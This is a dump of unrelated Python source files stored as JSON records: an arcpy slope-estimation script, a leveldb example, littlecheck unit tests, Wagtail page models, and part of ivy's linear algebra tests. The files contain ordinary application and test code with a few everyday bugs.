"1a2edeb41300d9909b9d2b82d2967da99d2b7ad2", "content": "###########################################################################\r\n### Estimation of Slope along the boundary using the buffer distance ###\r\n### Author : Lakshmi E ###\r\n### Last Edit: 13-April-2020 ###\r\n###########################################################################\r\n\r\nimport arcpy\r\nimport os,glob\r\nimport numpy as np\r\nfrom arcpy.sa import *\r\nfrom arcpy import env\r\nimport dbf\r\nimport csv\r\n\r\n# work in the current directory\r\nenv.workspace=(input(\"give the current directory:\")) #'C:\\Users\\Laks\\Desktop\\REGSim module'\r\ndirpath = os.getcwd()\r\n\r\n#assign the buffer distance \r\nbuffer_dist = input('Buffer distance between the study area (meters):')\r\nnum_pts = input('no. of points considered across the boundary:')\r\n\r\n# Load required toolboxes\r\narcpy.ImportToolbox(\".\\Module\\CreatePointsLines.tbx\")\r\narcpy.CheckOutExtension(\"spatial\")\r\n\r\n# create buffer in and out\r\ndef buffer(bound):\r\n print('Creating buffer inside and outside the boundary area...')\r\n arcpy.Buffer_analysis(bound, 'buffin{0}.shp'.format(buffer_dist),'-{0}'.format(buffer_dist),'FULL','ROUND','NONE','')\r\n arcpy.Buffer_analysis(bound, 'bufout{0}.shp'.format(buffer_dist),'{0}'.format(buffer_dist),'FULL','ROUND','NONE','')\r\n\r\nbound='bound_hmda.shp' \r\n\r\nbuffer(bound)\r\n\r\n# create points to the feature class\r\nprint('Converting polygon to line feature class...')\r\n\r\ndef ext_pts(bound,boundin,boundout,bufin,bufout):\r\n list=[bound,boundin,boundout,bufin,bufout] \r\n for i in list:\r\n print(i)\r\n arcpy.FeatureToLine_management(i,'{0}_line.shp'.format(i[:-4]),'','ATTRIBUTES')\r\n arcpy.AddField_management('{0}_line.shp'.format(i[:-4]),'Length','FLOAT','','','','','NULLABLE','NON_REQUIRED',\"\")\r\n arcpy.CalculateField_management('{0}_line.shp'.format(i[:-4]), \"Length\", \"!SHAPE.Length!\", \"PYTHON\", \"\")\r\n length = arcpy.da.SearchCursor('{0}_line.shp'.format(i[:-4]), \"Length\").next()[0]\r\n dist_intv = length/num_pts #point_num\r\n arcpy.CreatePointsLines_CreatePointsLines('{0}_line.shp'.format(i[:-4]),'INTERVAL BY DISTANCE', 'BEGINNING','NO','',dist_intv,'NO','{0}_pts.shp'.format(i[:-4]))\r\n\r\nprint('Created points to the feature class...')\r\nbound = 'bound_hmda.shp'\r\nboundin = 'bndin_hmda.shp'\r\nboundout = 'bndou_hmda.shp'\r\nbufin = 'buffin{0}.shp'.format(buffer_dist)\r\nbufout = 'bufout{0}.shp'.format(buffer_dist)\r\n\r\next_pts(bound,boundin,boundout,bufin,bufout)\r\n \r\n# extract elevation value to the points\r\nprint('Extracting the elevation data from the raster to the point featureclass...')\r\n\r\ndef pts_value(raster,list): \r\n for i in raster:\r\n print(i)\r\n ExtractValuesToPoints('bound_hmda_pts.shp','{0}'.format(i),'bound{1}_{0}_extrpts{2}_{3}.shp'.format(i[9:12],buffer_dist,num_pts,i[2:4]),'INTERPOLATE','VALUE_ONLY')\r\n arcpy.AddField_management('bound{1}_{0}_extrpts{2}_{3}.shp'.format(i[9:12],buffer_dist,num_pts,i[2:4]),\"Slope\",\"DOUBLE\",\"\", \"\", \"\", \"\", \"NULLABLE\", \"NON_REQUIRED\", \"\")\r\n for j,z in zip(list,list_bound):\r\n print(j)\r\n print(z)\r\n ExtractValuesToPoints('{0}_pts.shp'.format(j[:-4]),'{0}'.format(i),'{0}_{1}_extrpts.shp'.format(j[0:5],i[9:12]),'INTERPOLATE','VALUE_ONLY')\r\n ExtractValuesToPoints('{0}_pts.shp'.format(z[:-4]),'{0}'.format(i),'{0}_{1}_extrpts.shp'.format(z[0:5],i[9:12]),'INTERPOLATE','VALUE_ONLY')\r\n for k,l in zip(list_bound,list):\r\n arcpy.Near_analysis('{0}_{1}_extrpts.shp'.format(k[0:5],i[9:12]),'{0}_{1}_extrpts.shp'.format(l[0:5],i[9:12]),'','NO_LOCATION','NO_ANGLE')\r\n arcpy.JoinField_management('{0}_{1}_extrpts.shp'.format(k[0:5],i[9:12]),'NEAR_FID','{0}_{1}_extrpts.shp'.format(l[0:5],i[9:12]),\"FID\",\"#\")\r\n arcpy.AddField_management('{0}_{1}_extrpts.shp'.format(k[0:5],i[9:12]), \"Slope\", \"FLOAT\", \"\", \"\", \"\", \"\", \"NULLABLE\", \"NON_REQUIRED\", \"\")\r\n arcpy.AddField_management('{0}_{1}_extrpts.shp'.format(l[0:5],i[9:12]), \"Slope\", \"FLOAT\", \"\", \"\", \"\", \"\", \"NULLABLE\", \"NON_REQUIRED\", \"\")\r\n arcpy.CalculateField_management('bndou_{0}_extrpts.shp'.format(i[9:12]), \"Slope\", \"(!RASTERVALU!- !RASTERVA_1!) / !NEAR_DIST!\", \"PYTHON_9.3\", \"\")\r\n arcpy.CalculateField_management('bndin_{0}_extrpts.shp'.format(i[9:12]), \"Slope\", \"(!RASTERVA_1!-!RASTERVALU!) / !NEAR_DIST!\", \"PYTHON_9.3\", \"\")\r\n \r\n \r\nraster=sorted(glob.glob(\"*_GWL_*.tif\"))\r\nlist=['buffin{0}.shp'.format(buffer_dist),'bufout{0}.shp'.format(buffer_dist)]\r\nlist_bound = ['bndin_hmda.shp','bndou_hmda.shp']\r\n\r\npts_value(raster,list) \r\n\r\n# estimae the average slope\r\nprint('Estimating slope in each point of the boundary area...') \r\nfilesav = []\r\ndef avg_sl(raster): \r\n for i in raster:\r\n list=sorted(glob.glob('bnd*{0}_extrpts.dbf'.format(i[9:12])))\r\n print(list)\r\n tabin=dbf.Table('{0}'.format(list[0]))\r\n tabin.open()\r\n tabout=dbf.Table('{0}'.format(list[1]))\r\n tabout.open()\r\n tabbou=dbf.Table('bound{1}_{0}_extrpts{2}_{3}.dbf'.format(i[9:12],buffer_dist,num_pts,i[2:4]))\r\n tabbou.open(mode=dbf.READ_WRITE)\r\n \r\n for l,j,k in zip(tabin,tabout,range(0,len(tabbou))):\r\n mas=l[-1]\r\n sla=j[-1]\r\n res=((mas+sla)/2) \r\n with tabbou[k] as record:\r\n record.slope=res\r\n\r\n tabin.close()\r\n tabout.close()\r\n tabbou.close()\r\n print(tabbou)\r\n \r\n f = 'bound{1}_{0}_extrpts{2}_{3}'.format(i[9:12],buffer_dist,num_pts,i[2:4])\r\n filesav.append(f)\r\n \r\nraster=sorted(glob.glob(\"*_GWL_*.tif\"))\r\n\r\navg_sl(raster)\r\n\r\nprint(' Saving the output file')\r\nwith open('output.csv', 'wb') as output:\r\n csvwriter = csv.writer(output,dialect='excel')\r\n for row in filesav:\r\n csvwriter.writerow([row])\r\n output.close()\r\n\r\n#end of the script\r\n\r\n\r\n\r\n\r\n"} {"ext": "py", "sha": "1a2edef61dc501658997a39df402d79fc3b3143b", "content": "import leveldb\n\ndb = leveldb.LevelDB('./db')\n\n# single put\ndb.Put(b'hello', b'hello world')\nprint(db.Get(b'hello').decode('utf-8'))\n\n# multiple put/delete applied atomically, and committed to disk\nbatch = leveldb.WriteBatch()\nbatch.Put(b'hello', b'world')\nbatch.Put(b'hello again', b'world')\nbatch.Delete(b'hello')\n\ndb.Write(batch, sync = True)\n"} {"ext": "py", "sha": "1a2edfe6d1928a9d30ef2f2af1ae52daeae8cdd7", "content": "import unittest\nimport io\nimport os.path\nimport tempfile\n\nimport littlecheck\n\n\nclass LittlecheckTest(unittest.TestCase):\n @classmethod\n def setUpClass(self):\n \"\"\" Switch to test/files directory. \"\"\"\n test_dir = os.path.dirname(os.path.abspath(__file__))\n os.chdir(os.path.join(test_dir, \"files\"))\n\n def do_1_path_test(self, name, skip=False):\n \"\"\" Run a single test. The name is the test name.\n The input file is the name with .py extension, the expected\n output of littlecheck is the name with .expected extension.\n \"\"\"\n test_path = name + \".py\" if not \".\" in name else name\n expected_output_path = name + \".expected\"\n subs = {\"%\": \"%\", \"s\": test_path}\n conf = littlecheck.Config()\n failures = []\n success = littlecheck.check_path(test_path, subs, conf, failures.append)\n failures_message = \"\\n\".join([f.message() for f in failures]).strip()\n with io.open(expected_output_path, \"r\", encoding=\"utf-8\") as fd:\n expect_text = fd.read().strip()\n expect_success = not expect_text\n self.assertEqual(failures_message, expect_text)\n if skip:\n self.assertEqual(success, littlecheck.SKIP)\n else:\n self.assertEqual(success, expect_success)\n\n def test_py_ok(self):\n self.do_1_path_test(\"python_ok\")\n\n def test_py_err1(self):\n self.do_1_path_test(\"python_err1\")\n\n def test_py_middle_error(self):\n self.do_1_path_test(\"python_middle_error\")\n\n def test_py_missing_output(self):\n self.do_1_path_test(\"python_missing_output\")\n\n def test_py_multiple_errour_output(self):\n self.do_1_path_test(\"python_multipe_error_annotation_lines\")\n\n def test_py_extra_output(self):\n self.do_1_path_test(\"python_extra_output\")\n\n def test_py_out_vs_err(self):\n self.do_1_path_test(\"python_out_vs_err\")\n\n def test_py_path(self):\n self.do_1_path_test(\"python_path_cmd\")\n\n def test_py_shebang(self):\n self.do_1_path_test(\"python_shebang\")\n\n def test_py_color(self):\n self.do_1_path_test(\"python_color\")\n\n def test_inline_check(self):\n self.do_1_path_test(\"inline-check\")\n\n def test_py_whitespace(self):\n self.do_1_path_test(\"python_whitespace\")\n\n def test_py_replace(self):\n self.do_1_path_test(\"python_doublereplace\")\n\n def test_skip(self):\n self.do_1_path_test(\"skip\", skip=True)\n\n def test_require_succeeds(self):\n self.do_1_path_test(\"no_skip\", skip=False)\n\n def test_require_succeeds(self):\n self.do_1_path_test(\"no_skip\", skip=False)\n\n def test_exe_found(self):\n self.do_1_path_test(\"exe_found\")\n\n def test_exe_not_found(self):\n try:\n self.do_1_path_test(\"exe_not_found\")\n except littlecheck.CheckerError:\n return True\n raise Error\n"} {"ext": "py", "sha": "1a2ee250cabe087344af5c065384497ec20f9b02", "content": "from __future__ import absolute_import, unicode_literals\n\nfrom datetime import date\n\nfrom django.db import models\nfrom modelcluster.contrib.taggit import ClusterTaggableManager\nfrom modelcluster.fields import ParentalKey\nfrom taggit.models import TaggedItemBase\n\nfrom wagtail.utils.pagination import paginate\nfrom wagtail.wagtailadmin.edit_handlers import (\n FieldPanel, InlinePanel, MultiFieldPanel, PageChooserPanel)\nfrom wagtail.wagtailcore.fields import RichTextField\nfrom wagtail.wagtailcore.models import Orderable, Page\nfrom wagtail.wagtaildocs.edit_handlers import DocumentChooserPanel\nfrom wagtail.wagtailimages.edit_handlers import ImageChooserPanel\nfrom wagtail.wagtailsearch import index\n\n\n# ABSTRACT MODELS\n# =============================\n\nclass AbstractLinkFields(models.Model):\n link_external = models.URLField(\"External link\", blank=True)\n link_page = models.ForeignKey(\n 'wagtailcore.Page',\n null=True,\n blank=True,\n related_name='+',\n on_delete=models.CASCADE\n )\n link_document = models.ForeignKey(\n 'wagtaildocs.Document',\n null=True,\n blank=True,\n related_name='+',\n on_delete=models.CASCADE\n )\n\n @property\n def link(self):\n if self.link_page:\n return self.link_page.url\n elif self.link_document:\n return self.link_document.url\n else:\n return self.link_external\n\n api_fields = ('link', )\n\n panels = [\n FieldPanel('link_external'),\n PageChooserPanel('link_page'),\n DocumentChooserPanel('link_document'),\n ]\n\n class Meta:\n abstract = True\n\n\nclass AbstractRelatedLink(AbstractLinkFields):\n title = models.CharField(max_length=255, help_text=\"Link title\")\n\n api_fields = ('title', ) + AbstractLinkFields.api_fields\n\n panels = [\n FieldPanel('title'),\n MultiFieldPanel(AbstractLinkFields.panels, \"Link\"),\n ]\n\n class Meta:\n abstract = True\n\n\nclass AbstractCarouselItem(AbstractLinkFields):\n image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n embed_url = models.URLField(\"Embed URL\", blank=True)\n caption = models.CharField(max_length=255, blank=True)\n\n api_fields = (\n 'image',\n 'embed_url',\n 'caption',\n ) + AbstractLinkFields.api_fields\n\n panels = [\n ImageChooserPanel('image'),\n FieldPanel('embed_url'),\n FieldPanel('caption'),\n MultiFieldPanel(AbstractLinkFields.panels, \"Link\"),\n ]\n\n class Meta:\n abstract = True\n\n\nclass ContactFieldsMixin(models.Model):\n telephone = models.CharField(max_length=20, blank=True)\n email = models.EmailField(blank=True)\n address_1 = models.CharField(max_length=255, blank=True)\n address_2 = models.CharField(max_length=255, blank=True)\n city = models.CharField(max_length=255, blank=True)\n country = models.CharField(max_length=255, blank=True)\n post_code = models.CharField(max_length=10, blank=True)\n\n api_fields = (\n 'telephone',\n 'email',\n 'address_1',\n 'address_2',\n 'city',\n 'country',\n 'post_code',\n )\n\n panels = [\n FieldPanel('telephone'),\n FieldPanel('email'),\n FieldPanel('address_1'),\n FieldPanel('address_2'),\n FieldPanel('city'),\n FieldPanel('country'),\n FieldPanel('post_code'),\n ]\n\n class Meta:\n abstract = True\n\n\n# PAGE MODELS\n# =============================\n\n# Home page\n\nclass HomePage(Page):\n page_ptr = models.OneToOneField(Page, parent_link=True, related_name='+', on_delete=models.CASCADE)\n body = RichTextField(blank=True)\n\n api_fields = (\n 'body',\n 'carousel_items',\n 'related_links',\n )\n\n search_fields = Page.search_fields + [\n index.SearchField('body'),\n ]\n\n class Meta:\n verbose_name = \"homepage\"\n\n\nclass HomePageCarouselItem(Orderable, AbstractCarouselItem):\n page = ParentalKey('HomePage', related_name='carousel_items', on_delete=models.CASCADE)\n\n\nclass HomePageRelatedLink(Orderable, AbstractRelatedLink):\n page = ParentalKey('HomePage', related_name='related_links', on_delete=models.CASCADE)\n\n\nHomePage.content_panels = Page.content_panels + [\n FieldPanel('body', classname=\"full\"),\n\n InlinePanel('carousel_items', label=\"Carousel items\"),\n InlinePanel('related_links', label=\"Related links\"),\n]\n\n\n# Standard pages\n\nclass StandardPage(Page):\n page_ptr = models.OneToOneField(Page, parent_link=True, related_name='+', on_delete=models.CASCADE)\n intro = RichTextField(blank=True)\n body = RichTextField(blank=True)\n feed_image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n\n api_fields = (\n 'intro',\n 'body',\n 'feed_image',\n 'carousel_items',\n 'related_links',\n )\n\n search_fields = Page.search_fields + [\n index.SearchField('intro'),\n index.SearchField('body'),\n ]\n\n\nclass StandardPageCarouselItem(Orderable, AbstractCarouselItem):\n page = ParentalKey('StandardPage', related_name='carousel_items', on_delete=models.CASCADE)\n\n\nclass StandardPageRelatedLink(Orderable, AbstractRelatedLink):\n page = ParentalKey('StandardPage', related_name='related_links', on_delete=models.CASCADE)\n\n\nStandardPage.content_panels = Page.content_panels + [\n FieldPanel('intro', classname=\"full\"),\n InlinePanel('carousel_items', label=\"Carousel items\"),\n FieldPanel('body', classname=\"full\"),\n InlinePanel('related_links', label=\"Related links\"),\n]\n\n\nStandardPage.promote_panels = [\n MultiFieldPanel(Page.promote_panels, \"Common page configuration\"),\n ImageChooserPanel('feed_image'),\n]\n\n\nclass StandardIndexPage(Page):\n page_ptr = models.OneToOneField(Page, parent_link=True, related_name='+', on_delete=models.CASCADE)\n intro = RichTextField(blank=True)\n feed_image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n\n api_fields = (\n 'intro',\n 'feed_image',\n 'related_links',\n )\n\n search_fields = Page.search_fields + [\n index.SearchField('intro'),\n ]\n\n\nclass StandardIndexPageRelatedLink(Orderable, AbstractRelatedLink):\n page = ParentalKey('StandardIndexPage', related_name='related_links', on_delete=models.CASCADE)\n\n\nStandardIndexPage.content_panels = Page.content_panels + [\n FieldPanel('intro', classname=\"full\"),\n InlinePanel('related_links', label=\"Related links\"),\n]\n\n\nStandardIndexPage.promote_panels = [\n MultiFieldPanel(Page.promote_panels, \"Common page configuration\"),\n ImageChooserPanel('feed_image'),\n]\n\n\n# Blog pages\n\nclass BlogEntryPage(Page):\n page_ptr = models.OneToOneField(Page, parent_link=True, related_name='+', on_delete=models.CASCADE)\n body = RichTextField()\n tags = ClusterTaggableManager(through='BlogEntryPageTag', blank=True)\n date = models.DateField(\"Post date\")\n feed_image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n\n api_fields = (\n 'body',\n 'tags',\n 'date',\n 'feed_image',\n 'carousel_items',\n 'related_links',\n )\n\n search_fields = Page.search_fields + [\n index.SearchField('body'),\n ]\n\n def get_blog_index(self):\n # Find closest ancestor which is a blog index\n return BlogIndexPage.ancestor_of(self).last()\n\n\nclass BlogEntryPageCarouselItem(Orderable, AbstractCarouselItem):\n page = ParentalKey('BlogEntryPage', related_name='carousel_items', on_delete=models.CASCADE)\n\n\nclass BlogEntryPageRelatedLink(Orderable, AbstractRelatedLink):\n page = ParentalKey('BlogEntryPage', related_name='related_links', on_delete=models.CASCADE)\n\n\nclass BlogEntryPageTag(TaggedItemBase):\n content_object = ParentalKey('BlogEntryPage', related_name='tagged_items', on_delete=models.CASCADE)\n\n\nBlogEntryPage.content_panels = Page.content_panels + [\n FieldPanel('date'),\n FieldPanel('body', classname=\"full\"),\n InlinePanel('carousel_items', label=\"Carousel items\"),\n InlinePanel('related_links', label=\"Related links\"),\n]\n\n\nBlogEntryPage.promote_panels = [\n MultiFieldPanel(Page.promote_panels, \"Common page configuration\"),\n ImageChooserPanel('feed_image'),\n FieldPanel('tags'),\n]\n\n\nclass BlogIndexPage(Page):\n page_ptr = models.OneToOneField(Page, parent_link=True, related_name='+', on_delete=models.CASCADE)\n intro = RichTextField(blank=True)\n\n api_fields = (\n 'intro',\n 'related_links',\n )\n\n search_fields = Page.search_fields + [\n index.SearchField('intro'),\n ]\n\n def get_blog_entries(self):\n # Get list of live blog pages that are descendants of this page\n entries = BlogEntryPage.objects.descendant_of(self).live()\n\n # Order by most recent date first\n entries = entries.order_by('-date')\n\n return entries\n\n def get_context(self, request):\n # Get blog entries\n entries = self.get_blog_entries()\n\n # Filter by tag\n tag = request.GET.get('tag')\n if tag:\n entries = entries.filter(tags__name=tag)\n\n paginator, entries = paginate(request, entries, page_key='page', per_page=10)\n\n # Update template context\n context = super(BlogIndexPage, self).get_context(request)\n context['entries'] = entries\n return context\n\n\nclass BlogIndexPageRelatedLink(Orderable, AbstractRelatedLink):\n page = ParentalKey('BlogIndexPage', related_name='related_links', on_delete=models.CASCADE)\n\n\nBlogIndexPage.content_panels = Page.content_panels + [\n FieldPanel('intro', classname=\"full\"),\n InlinePanel('related_links', label=\"Related links\"),\n]\n\n\n# Events pages\n\nclass EventPage(Page):\n page_ptr = models.OneToOneField(Page, parent_link=True, related_name='+', on_delete=models.CASCADE)\n AUDIENCE_CHOICES = (\n ('public', \"Public\"),\n ('private', \"Private\"),\n )\n\n date_from = models.DateField(\"Start date\")\n date_to = models.DateField(\n \"End date\",\n null=True,\n blank=True,\n help_text=\"Not required if event is on a single day\"\n )\n time_from = models.TimeField(\"Start time\", null=True, blank=True)\n time_to = models.TimeField(\"End time\", null=True, blank=True)\n audience = models.CharField(max_length=255, choices=AUDIENCE_CHOICES)\n location = models.CharField(max_length=255)\n body = RichTextField(blank=True)\n cost = models.CharField(max_length=255)\n signup_link = models.URLField(blank=True)\n feed_image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n\n api_fields = (\n 'date_from',\n 'date_to',\n 'time_from',\n 'time_to',\n 'audience',\n 'location',\n 'body',\n 'cost',\n 'signup_link',\n 'feed_image',\n 'carousel_items',\n 'related_links',\n 'speakers',\n )\n\n search_fields = Page.search_fields + [\n index.SearchField('get_audience_display'),\n index.SearchField('location'),\n index.SearchField('body'),\n ]\n\n def get_event_index(self):\n # Find closest ancestor which is an event index\n return EventIndexPage.objects.ancester_of(self).last()\n\n\nclass EventPageCarouselItem(Orderable, AbstractCarouselItem):\n page = ParentalKey('EventPage', related_name='carousel_items', on_delete=models.CASCADE)\n\n\nclass EventPageRelatedLink(Orderable, AbstractRelatedLink):\n page = ParentalKey('EventPage', related_name='related_links', on_delete=models.CASCADE)\n\n\nclass EventPageSpeaker(Orderable, AbstractLinkFields):\n page = ParentalKey('EventPage', related_name='speakers', on_delete=models.CASCADE)\n first_name = models.CharField(\"Name\", max_length=255, blank=True)\n last_name = models.CharField(\"Surname\", max_length=255, blank=True)\n image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n\n api_fields = (\n 'first_name',\n 'last_name',\n 'image',\n )\n\n panels = [\n FieldPanel('first_name'),\n FieldPanel('last_name'),\n ImageChooserPanel('image'),\n MultiFieldPanel(AbstractLinkFields.panels, \"Link\"),\n ]\n\nEventPage.content_panels = Page.content_panels + [\n FieldPanel('date_from'),\n FieldPanel('date_to'),\n FieldPanel('time_from'),\n FieldPanel('time_to'),\n FieldPanel('location'),\n FieldPanel('audience'),\n FieldPanel('cost'),\n FieldPanel('signup_link'),\n InlinePanel('carousel_items', label=\"Carousel items\"),\n FieldPanel('body', classname=\"full\"),\n InlinePanel('speakers', label=\"Speakers\"),\n InlinePanel('related_links', label=\"Related links\"),\n]\n\n\nEventPage.promote_panels = [\n MultiFieldPanel(Page.promote_panels, \"Common page configuration\"),\n ImageChooserPanel('feed_image'),\n]\n\n\nclass EventIndexPage(Page):\n page_ptr = models.OneToOneField(Page, parent_link=True, related_name='+', on_delete=models.CASCADE)\n intro = RichTextField(blank=True)\n\n api_fields = (\n 'intro',\n 'related_links',\n )\n\n search_fields = Page.search_fields + [\n index.SearchField('intro'),\n ]\n\n def get_events(self):\n # Get list of live event pages that are descendants of this page\n events = EventPage.objects.descendant_of(self).live()\n\n # Filter events list to get ones that are either\n # running now or start in the future\n events = events.filter(date_from__gte=date.today())\n\n # Order by date\n events = events.order_by('date_from')\n\n return events\n\n\nclass EventIndexPageRelatedLink(Orderable, AbstractRelatedLink):\n page = ParentalKey('EventIndexPage', related_name='related_links', on_delete=models.CASCADE)\n\n\nEventIndexPage.content_panels = Page.content_panels + [\n FieldPanel('intro', classname=\"full\"),\n InlinePanel('related_links', label=\"Related links\"),\n]\n\n\n# Person page\n\nclass PersonPage(Page, ContactFieldsMixin):\n page_ptr = models.OneToOneField(Page, parent_link=True, related_name='+', on_delete=models.CASCADE)\n first_name = models.CharField(max_length=255)\n last_name = models.CharField(max_length=255)\n intro = RichTextField(blank=True)\n biography = RichTextField(blank=True)\n image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n feed_image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n\n api_fields = (\n 'first_name',\n 'last_name',\n 'intro',\n 'biography',\n 'image',\n 'feed_image',\n 'related_links',\n ) + ContactFieldsMixin.api_fields\n\n search_fields = Page.search_fields + [\n index.SearchField('first_name'),\n index.SearchField('last_name'),\n index.SearchField('intro'),\n index.SearchField('biography'),\n ]\n\n\nclass PersonPageRelatedLink(Orderable, AbstractRelatedLink):\n page = ParentalKey('PersonPage', related_name='related_links', on_delete=models.CASCADE)\n\n\nPersonPage.content_panels = Page.content_panels + [\n FieldPanel('first_name'),\n FieldPanel('last_name'),\n FieldPanel('intro', classname=\"full\"),\n FieldPanel('biography', classname=\"full\"),\n ImageChooserPanel('image'),\n MultiFieldPanel(ContactFieldsMixin.panels, \"Contact\"),\n InlinePanel('related_links', label=\"Related links\"),\n]\n\n\nPersonPage.promote_panels = [\n MultiFieldPanel(Page.promote_panels, \"Common page configuration\"),\n ImageChooserPanel('feed_image'),\n]\n\n\n# Contact page\n\nclass ContactPage(Page, ContactFieldsMixin):\n page_ptr = models.OneToOneField(Page, parent_link=True, related_name='+', on_delete=models.CASCADE)\n body = RichTextField(blank=True)\n feed_image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n\n api_fields = (\n 'body',\n 'feed_image',\n ) + ContactFieldsMixin.api_fields\n\n search_fields = Page.search_fields + [\n index.SearchField('body'),\n ]\n\n\nContactPage.content_panels = Page.content_panels + [\n FieldPanel('body', classname=\"full\"),\n MultiFieldPanel(ContactFieldsMixin.panels, \"Contact\"),\n]\n\n\nContactPage.promote_panels = [\n MultiFieldPanel(Page.promote_panels, \"Common page configuration\"),\n ImageChooserPanel('feed_image'),\n]\n"} {"ext": "py", "sha": "1a2ee26475bd8974ad69e81f1b56eb9dc019880d", "content": "\"\"\"Collection of tests for unified linear algebra functions.\"\"\"\n\n# global\nimport numpy as np\nfrom hypothesis import given, strategies as st\n\n# local\nimport ivy_tests.test_ivy.helpers as helpers\nimport ivy.functional.backends.numpy as ivy_np\n\n\n# vector_to_skew_symmetric_matrix\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_numeric_dtypes), 1),\n as_variable=st.booleans(),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=st.booleans(),\n container=st.booleans(),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n)\ndef test_vector_to_skew_symmetric_matrix(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n):\n if \"float16\" or \"int8\" in input_dtype:\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"vector_to_skew_symmetric_matrix\",\n vector=np.random.uniform(size=(a, 3)).astype(input_dtype[0]),\n )\n\n\n# matrix_power\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_float_dtypes), 1),\n as_variable=st.booleans(),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=st.booleans(),\n container=st.booleans(),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n n=st.integers(-10, 10),\n)\ndef test_matrix_power(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n n,\n):\n if fw == \"torch\" and input_dtype == \"float16\":\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"matrix_power\",\n n=n,\n x=np.random.uniform(size=(a, a)).astype(input_dtype[0]),\n )\n\n\n# matmul\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_numeric_dtypes), 2),\n as_variable=helpers.list_of_length(st.booleans(), 2),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=helpers.list_of_length(st.booleans(), 2),\n container=helpers.list_of_length(st.booleans(), 2),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n b=st.integers(1, 50),\n c=st.integers(1, 50),\n seed=st.integers(0, 2**16 - 1),\n)\ndef test_matmul(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n b,\n c,\n seed,\n):\n np.random.seed(seed)\n if \"float16\" or \"int8\" in input_dtype:\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"matmul\",\n rtol=5e-02,\n atol=5e-02,\n x1=np.random.uniform(size=(a, b)).astype(input_dtype[0]),\n x2=np.random.uniform(size=(b, c)).astype(input_dtype[1]),\n )\n\n\n# det\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_float_dtypes), 1),\n as_variable=st.booleans(),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=st.booleans(),\n container=st.booleans(),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n b=st.integers(1, 50),\n)\ndef test_det(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n b,\n):\n if \"float16\" in input_dtype:\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"det\",\n x=np.random.uniform(size=(b, a, a)).astype(input_dtype[0]),\n )\n\n\n# eigh\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_float_dtypes), 1),\n as_variable=st.booleans(),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=st.booleans(),\n container=st.booleans(),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n b=st.integers(1, 50),\n)\ndef test_eigh(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n b,\n):\n if \"float16\" in input_dtype:\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"eigh\",\n x=np.random.uniform(size=(b, a, a)).astype(input_dtype[0]),\n )\n\n\n# eigvalsh\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_float_dtypes), 1),\n as_variable=st.booleans(),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=st.booleans(),\n container=st.booleans(),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n b=st.integers(1, 50),\n)\ndef test_eigvalsh(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n b,\n):\n if \"float16\" in input_dtype:\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"eigvalsh\",\n x=np.random.uniform(size=(b, a, a)).astype(input_dtype[0]),\n )\n\n\n# inv\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_float_dtypes), 1),\n 